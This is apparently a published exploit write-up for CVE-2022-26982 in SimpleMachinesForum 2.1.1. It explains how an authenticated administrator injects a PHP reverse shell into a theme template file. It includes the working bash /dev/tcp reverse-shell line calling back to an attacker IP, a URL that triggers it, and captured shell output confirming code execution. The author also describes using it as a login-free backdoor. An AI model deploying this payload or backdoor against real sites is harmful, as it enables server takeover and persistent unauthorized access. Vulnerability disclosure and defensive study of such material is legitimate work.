# Exploit Title: Authenticated Remote Code Execution in SimpleMachinesForum 2.1.1 # Remote Code Execution in SimpleMachinesForum 2.1.1 and earlier allows remote attackers to execute arbitrary code via uploading a php web shell. SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator. # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718 # Date: 7th March 2022 # CVE ID: CVE-2022-26982 # Confirmed on release 2.1.1 # Vendor: https://download.simplemachines.org/ # Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor! ############################################### #Step1- Login with Admin Credentials #Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php #Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?> #Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page #Step5- Now click on "Themes and Layout" and you will get the reverse shell: E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276 bash: cannot set terminal process group (1334): Inappropriate ioctl for device bash: no job control in this shell daemon@debian:/opt/bitnami/simplemachinesforum$ whoami whoami daemon daemon@debian:/opt/bitnami/simplemachinesforum$ id id uid=1(daemon) gid=1(daemon) groups=1(daemon) daemon@debian:/opt/bitnami/simplemachinesforum$